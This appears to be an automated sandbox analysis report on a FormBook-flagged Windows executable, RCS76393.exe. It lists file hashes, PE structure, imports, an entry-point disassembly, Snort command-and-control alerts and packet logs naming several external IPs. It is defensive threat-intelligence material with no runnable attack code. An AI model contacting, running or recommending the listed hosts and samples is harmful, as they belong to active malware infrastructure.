                                                                    BODIS-NJUSPaymentAdvice.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    RFQ_ V-21-Kiel-050-D02.xlsxGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    New Order.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    payment.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    Order.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    PaymentInvoice.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    SB210330034.pdf.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    swift_76567643.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    Request an Estimate_2021_04_01.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    2021-04-01.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    onbgX3WswF.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    ARBmDNJS7m.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    PO.1183.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    Scan-45679.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    TT Remittance Copy.PDF.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    DK Purchase Order 2021 - 00041.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    9tRIEZUd1j.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    No created / dropped files found

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):6.958502033101644
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                    • Clipper DOS Executable (2020/12) 0.02%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • VXD Driver (31/22) 0.00%
                                                                    File name:RCS76393.exe
                                                                    File size:386560
                                                                    MD5:1ab1c3129fa0764ea0702da70f3ef569
                                                                    SHA1:ee8cd1946b58390f4599056df1472d01cf85a543
                                                                    SHA256:5d1870672eff4e2ec6d699d654d5268051f7a56f8ca991fefa538eeef380a89c
                                                                    SHA512:58bb904dc8d4435e232936f2972037dbf8b214559d0156c5d5275fdc3547a25e7ce92910459cd7f5c737641df74078e7060f0825df79b99203c2fb5033a0501c
                                                                    SSDEEP:6144:jK3TcyLImYxn3QDQEachg1e4VqOWB4hqynGEpNA:jK3Td093QDQEachGeZ8Gs2
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L..."Z.^...........

                                                                    File Icon

                                                                    Icon Hash:8692f0c4c4ccb2ce

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x4041a3
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x5EE25A22 [Thu Jun 11 16:21:54 2020 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:0
                                                                    File Version Major:5
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:9c90aa63bb435d1aab6db36d5bf4ee01

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    call 00007F1EB8BC4ECDh
                                                                    jmp 00007F1EB8BBD9BEh
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    test ecx, 00000003h
                                                                    je 00007F1EB8BBDB66h
                                                                    mov al, byte ptr [ecx]
                                                                    add ecx, 01h
                                                                    test al, al
                                                                    je 00007F1EB8BBDB90h
                                                                    test ecx, 00000003h
                                                                    jne 00007F1EB8BBDB31h
                                                                    add eax, 00000000h
                                                                    lea esp, dword ptr [esp+00000000h]
                                                                    lea esp, dword ptr [esp+00000000h]
                                                                    mov eax, dword ptr [ecx]
                                                                    mov edx, 7EFEFEFFh
                                                                    add edx, eax
                                                                    xor eax, FFFFFFFFh
                                                                    xor eax, edx
                                                                    add ecx, 04h
                                                                    test eax, 81010100h
                                                                    je 00007F1EB8BBDB2Ah
                                                                    mov eax, dword ptr [ecx-04h]
                                                                    test al, al
                                                                    je 00007F1EB8BBDB74h
                                                                    test ah, ah
                                                                    je 00007F1EB8BBDB66h
                                                                    test eax, 00FF0000h
                                                                    je 00007F1EB8BBDB55h
                                                                    test eax, FF000000h
                                                                    je 00007F1EB8BBDB44h
                                                                    jmp 00007F1EB8BBDB0Fh
                                                                    lea eax, dword ptr [ecx-01h]
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    sub eax, ecx
                                                                    ret
                                                                    lea eax, dword ptr [ecx-02h]
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    sub eax, ecx
                                                                    ret
                                                                    lea eax, dword ptr [ecx-03h]
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    sub eax, ecx
                                                                    ret
                                                                    lea eax, dword ptr [ecx-04h]
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    sub eax, ecx
                                                                    ret
                                                                    mov edi, edi
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 20h
                                                                    mov eax, dword ptr [ebp+08h]
                                                                    push esi
                                                                    push edi
                                                                    push 00000008h
                                                                    pop ecx
                                                                    mov esi, 03DAD300h
                                                                    lea edi, dword ptr [ebp-20h]
                                                                    rep movsd
                                                                    mov dword ptr [ebp-08h], eax
                                                                    mov eax, dword ptr [ebp+0Ch]
                                                                    pop edi
                                                                    mov dword ptr [ebp-04h], eax
                                                                    pop esi
                                                                    test eax, eax
                                                                    je 00007F1EB8BBDB4Eh
                                                                    test byte ptr [eax], 00000008h
                                                                    je 00007F1EB8BBDB49h
                                                                    mov dword ptr [ebp+00h], 00000000h

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x39b18a00x67.new
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x39b0d840x3c.new
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x39b20000x2ca0.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x39b50000x1a9c.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39afa580x40.new
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x39ad0000x1e8.new
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x4ab430x4ac00False0.740110263378data7.49545295007IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .data0x4c0000x395d2880x1c00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                    .jidiy0x39aa0000x10x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                    .wahe0x39ab0000x11790x400False0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                    .new0x39ad0000x49070x4a00False0.372096706081data5.4613035653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x39b20000x2ca00x2e00False0.558848505435data5.00204478072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x39b50000x99180x9a00False0.146027800325data1.75035156037IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_CURSOR0x39b34980x134data
                                                                    RT_ICON0x39b23a00x10a8data
                                                                    RT_STRING0x39b37b80x148data
                                                                    RT_STRING0x39b39000x304data
                                                                    RT_STRING0x39b3c080x510data
                                                                    RT_STRING0x39b41180x502data
                                                                    RT_STRING0x39b46200x424data
                                                                    RT_STRING0x39b4a480xe6data
                                                                    RT_STRING0x39b4b300x16edata
                                                                    RT_ACCELERATOR0x39b34600x18data
                                                                    RT_GROUP_CURSOR0x39b35d00x14Lotus unknown worksheet or configuration, revision 0x1
                                                                    RT_GROUP_ICON0x39b34480x14data
                                                                    RT_VERSION0x39b35e80x1d0data
                                                                    None0x39b34780xadata
                                                                    None0x39b34880xadata

                                                                    Imports

                                                                    DLLImport
                                                                    KERNEL32.dllHeapReAlloc, RemoveVectoredExceptionHandler, EnumDateFormatsExW, FindResourceExW, WriteConsoleOutputCharacterA, LoadResource, SetWaitableTimer, GetCurrentProcess, HeapFree, GetModuleHandleExW, GlobalLock, CancelWaitableTimer, LockFile, SetTapeParameters, GetModuleHandleW, EnumCalendarInfoExW, TzSpecificLocalTimeToSystemTime, GetLocaleInfoW, GetSystemTimeAdjustment, InterlockedPopEntrySList, GetFileAttributesA, GetCompressedFileSizeA, GetTimeZoneInformation, GetEnvironmentVariableA, DisconnectNamedPipe, VirtualUnlock, GetConsoleAliasesW, GetProcAddress, GetAtomNameA, LocalAlloc, AddAtomA, GlobalFindAtomW, GlobalUnWire, lstrcatW, FatalExit, GetFileTime, GetConsoleCursorInfo, LocalFree, LCMapStringW, SetEnvironmentVariableA, CompareStringW, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetStartupInfoW, RaiseException, RtlUnwind, HeapAlloc, GetLastError, EnterCriticalSection, LeaveCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, GetCurrentThread, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, HeapCreate, HeapDestroy, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, FatalAppExitA, VirtualAlloc, MultiByteToWideChar, CloseHandle, CreateFileA, InitializeCriticalSectionAndSpinCount, HeapSize, SetConsoleCtrlHandler, FreeLibrary, InterlockedExchange, LoadLibraryA, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, LCMapStringA, GetStringTypeA, GetStringTypeW, GetTimeFormatA, GetDateFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, FlushFileBuffers, ReadFile, SetEndOfFile, GetProcessHeap, CompareStringA, GetModuleHandleA
                                                                    USER32.dllGetProcessDefaultLayout

                                                                    Exports

                                                                    NameOrdinalAddress
                                                                    Lolipops10x4448a0
                                                                    NoMore20x444880
                                                                    Robin30x444890

                                                                    Version Infos

                                                                    DescriptionData
                                                                    InternalNamecalimatimodunads.exe
                                                                    FileVersions7.0.2.54
                                                                    LegalCopyrightsVsekda
                                                                    ProductVersions7.0.21.45
                                                                    Translation0x0129 0x062b

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    04/08/21-12:46:58.836959TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.6198.185.159.144
                                                                    04/08/21-12:46:58.836959TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.6198.185.159.144
                                                                    04/08/21-12:46:58.836959TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.6198.185.159.144
                                                                    04/08/21-12:47:09.209527TCP1201ATTACK-RESPONSES 403 Forbidden804974234.102.136.180192.168.2.6

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Apr 8, 2021 12:46:38.828039885 CEST4972380192.168.2.6104.160.174.177
                                                                    Apr 8, 2021 12:46:41.838196039 CEST4972380192.168.2.6104.160.174.177
                                                                    Apr 8, 2021 12:46:42.010420084 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:42.011430979 CEST4972380192.168.2.6104.160.174.177
                                                                    Apr 8, 2021 12:46:42.498070002 CEST4972380192.168.2.6104.160.174.177
                                                                    Apr 8, 2021 12:46:42.671731949 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:43.010082960 CEST4972380192.168.2.6104.160.174.177
                                                                    Apr 8, 2021 12:46:43.221426964 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:43.287656069 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:43.287707090 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:43.287720919 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:43.287738085 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:43.287756920 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:43.287769079 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:43.287785053 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:43.287884951 CEST4972380192.168.2.6104.160.174.177
                                                                    Apr 8, 2021 12:46:43.287955999 CEST4972380192.168.2.6104.160.174.177
                                                                    Apr 8, 2021 12:46:43.287972927 CEST4972380192.168.2.6104.160.174.177
                                                                    Apr 8, 2021 12:46:48.174196005 CEST4972680192.168.2.6104.161.84.100
                                                                    Apr 8, 2021 12:46:48.335020065 CEST8049726104.161.84.100192.168.2.6
                                                                    Apr 8, 2021 12:46:48.335206032 CEST4972680192.168.2.6104.161.84.100
                                                                    Apr 8, 2021 12:46:48.335388899 CEST4972680192.168.2.6104.161.84.100
                                                                    Apr 8, 2021 12:46:48.495990038 CEST8049726104.161.84.100192.168.2.6
                                                                    Apr 8, 2021 12:46:48.497931004 CEST8049726104.161.84.100192.168.2.6
                                                                    Apr 8, 2021 12:46:48.497960091 CEST8049726104.161.84.100192.168.2.6
                                                                    Apr 8, 2021 12:46:48.498164892 CEST4972680192.168.2.6104.161.84.100
                                                                    Apr 8, 2021 12:46:48.498274088 CEST4972680192.168.2.6104.161.84.100
                                                                    Apr 8, 2021 12:46:48.658807993 CEST8049726104.161.84.100192.168.2.6
                                                                    Apr 8, 2021 12:46:58.729919910 CEST4974180192.168.2.6198.185.159.144
                                                                    Apr 8, 2021 12:46:58.836591959 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.836755037 CEST4974180192.168.2.6198.185.159.144
                                                                    Apr 8, 2021 12:46:58.836958885 CEST4974180192.168.2.6198.185.159.144
                                                                    Apr 8, 2021 12:46:58.943339109 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951539993 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951575041 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951591969 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951605082 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951620102 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951636076 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951647997 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951667070 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951689959 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951697111 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951709986 CEST4974180192.168.2.6198.185.159.144
                                                                    Apr 8, 2021 12:46:58.951854944 CEST4974180192.168.2.6198.185.159.144
                                                                    Apr 8, 2021 12:46:58.951930046 CEST4974180192.168.2.6198.185.159.144
                                                                    Apr 8, 2021 12:46:59.058216095 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:59.058240891 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:59.058259964 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:59.058274984 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:59.058293104 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:59.058310032 CEST4974180192.168.2.6198.185.159.144
                                                                    Apr 8, 2021 12:46:59.058310986 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:59.058326006 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:59.058422089 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:59.058439016 CEST4974180192.168.2.6198.185.159.144
                                                                    Apr 8, 2021 12:46:59.058764935 CEST4974180192.168.2.6198.185.159.144
                                                                    Apr 8, 2021 12:47:09.080147982 CEST4974280192.168.2.634.102.136.180
                                                                    Apr 8, 2021 12:47:09.092434883 CEST804974234.102.136.180192.168.2.6
                                                                    Apr 8, 2021 12:47:09.092621088 CEST4974280192.168.2.634.102.136.180
                                                                    Apr 8, 2021 12:47:09.092782021 CEST4974280192.168.2.634.102.136.180
                                                                    Apr 8, 2021 12:47:09.104984999 CEST804974234.102.136.180192.168.2.6
                                                                    Apr 8, 2021 12:47:09.209527016 CEST804974234.102.136.180192.168.2.6
                                                                    Apr 8, 2021 12:47:09.209676981 CEST804974234.102.136.180192.168.2.6
                                                                    Apr 8, 2021 12:47:09.209800959 CEST4974280192.168.2.634.102.136.180
                                                                    Apr 8, 2021 12:47:09.209867001 CEST4974280192.168.2.634.102.136.180
                                                                    Apr 8, 2021 12:47:09.222744942 CEST804974234.102.136.180192.168.2.6
                                                                    Apr 8, 2021 12:47:14.550185919 CEST4974380192.168.2.6193.168.194.206
                                                                    Apr 8, 2021 12:47:17.559937954 CEST4974380192.168.2.6193.168.194.206
                                                                    Apr 8, 2021 12:47:17.752141953 CEST8049743193.168.194.206192.168.2.6
                                                                    Apr 8, 2021 12:47:17.752445936 CEST4974380192.168.2.6193.168.194.206
                                                                    Apr 8, 2021 12:47:17.752739906 CEST4974380192.168.2.6193.168.194.206
                                                                    Apr 8, 2021 12:47:17.944873095 CEST8049743193.168.194.206192.168.2.6
                                                                    Apr 8, 2021 12:47:18.263333082 CEST4974380192.168.2.6193.168.194.206
                                                                    Apr 8, 2021 12:47:18.495343924 CEST8049743193.168.194.206192.168.2.6
                                                                    Apr 8, 2021 12:47:24.087763071 CEST8049743193.168.194.206192.168.2.6
                                                                    Apr 8, 2021 12:47:24.087795973 CEST8049743193.168.194.206192.168.2.6
                                                                    Apr 8, 2021 12:47:24.087848902 CEST4974380192.168.2.6193.168.194.206
                                                                    Apr 8, 2021 12:47:24.087867975 CEST4974380192.168.2.6193.168.194.206
                                                                    Apr 8, 2021 12:47:33.582299948 CEST4974980192.168.2.6199.59.242.153
                                                                    Apr 8, 2021 12:47:33.692231894 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.692333937 CEST4974980192.168.2.6199.59.242.153
                                                                    Apr 8, 2021 12:47:33.692498922 CEST4974980192.168.2.6199.59.242.153
                                                                    Apr 8, 2021 12:47:33.802305937 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.802937031 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.803009987 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.803033113 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.803052902 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.803070068 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.803193092 CEST4974980192.168.2.6199.59.242.153
                                                                    Apr 8, 2021 12:47:33.803306103 CEST4974980192.168.2.6199.59.242.153
                                                                    Apr 8, 2021 12:47:38.885835886 CEST4975080192.168.2.685.159.66.93
                                                                    Apr 8, 2021 12:47:38.937621117 CEST804975085.159.66.93192.168.2.6
                                                                    Apr 8, 2021 12:47:38.938090086 CEST4975080192.168.2.685.159.66.93
                                                                    Apr 8, 2021 12:47:38.938357115 CEST4975080192.168.2.685.159.66.93
                                                                    Apr 8, 2021 12:47:38.990061045 CEST804975085.159.66.93192.168.2.6
                                                                    Apr 8, 2021 12:47:38.990087032 CEST804975085.159.66.93192.168.2.6
                                                                    Apr 8, 2021 12:47:38.990317106 CEST4975080192.168.2.685.159.66.93
                                                                    Apr 8, 2021 12:47:38.990350962 CEST4975080192.168.2.685.159.66.93
                                                                    Apr 8, 2021 12:47:39.041932106 CEST804975085.159.66.93192.168.2.6
                                                                    Apr 8, 2021 12:47:44.149405956 CEST4975180192.168.2.694.46.9.37
                                                                    Apr 8, 2021 12:47:47.148294926 CEST4975180192.168.2.694.46.9.37
                                                                    Apr 8, 2021 12:47:53.148761988 CEST4975180192.168.2.694.46.9.37

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Apr 8, 2021 12:45:40.491200924 CEST5837753192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:45:40.503812075 CEST53583778.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:45:40.519510031 CEST5507453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:45:40.531883955 CEST53550748.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:45:40.561065912 CEST5451353192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:45:40.574002981 CEST53545138.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:45:41.460359097 CEST6204453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:45:41.473582029 CEST53620448.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:45:42.396193981 CEST6379153192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:45:42.415102959 CEST53637918.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:45:46.134046078 CEST6426753192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:45:46.146598101 CEST53642678.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:45:46.986300945 CEST4944853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:45:46.998900890 CEST53494488.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:45:52.766400099 CEST6034253192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:45:52.779835939 CEST53603428.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:02.372802019 CEST6134653192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:02.385209084 CEST53613468.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:04.517719984 CEST5177453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:04.529655933 CEST53517748.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:06.922087908 CEST5602353192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:06.934973001 CEST53560238.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:08.683914900 CEST5838453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:08.697056055 CEST53583848.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:11.894196033 CEST6026153192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:11.907191992 CEST53602618.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:12.857455969 CEST5606153192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:12.869524956 CEST53560618.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:13.544354916 CEST5833653192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:13.557018995 CEST53583368.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:14.242495060 CEST5378153192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:14.256418943 CEST53537818.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:15.592278957 CEST5406453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:15.604839087 CEST53540648.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:16.340641975 CEST5281153192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:16.354026079 CEST53528118.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:17.016047001 CEST5529953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:17.029288054 CEST53552998.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:17.737343073 CEST6374553192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:17.750946999 CEST53637458.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:18.768487930 CEST5005553192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:18.781229973 CEST53500558.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:19.469026089 CEST6137453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:19.481959105 CEST53613748.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:29.406141043 CEST5033953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:29.423815012 CEST53503398.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:36.685190916 CEST6330753192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:36.704133034 CEST53633078.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:38.335319042 CEST4969453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:38.818474054 CEST53496948.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:46.989202976 CEST5498253192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:47.105591059 CEST53549828.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:47.799890041 CEST5001053192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:48.030651093 CEST6371853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:48.069102049 CEST53500108.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:48.173165083 CEST53637188.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:48.494082928 CEST6211653192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:48.506784916 CEST53621168.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:48.805192947 CEST6381653192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:48.818182945 CEST53638168.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:49.010258913 CEST5501453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:49.045222998 CEST53550148.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:49.234910011 CEST6220853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:49.324081898 CEST53622088.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:49.741507053 CEST5757453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:49.755121946 CEST53575748.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:50.091692924 CEST5181853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:50.104129076 CEST53518188.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:50.764836073 CEST5662853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:50.832796097 CEST53566288.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:51.420423031 CEST6077853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:51.433657885 CEST53607788.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:51.829622984 CEST5379953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:51.842360020 CEST53537998.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:53.534490108 CEST5468353192.168.2.68.8.8.8
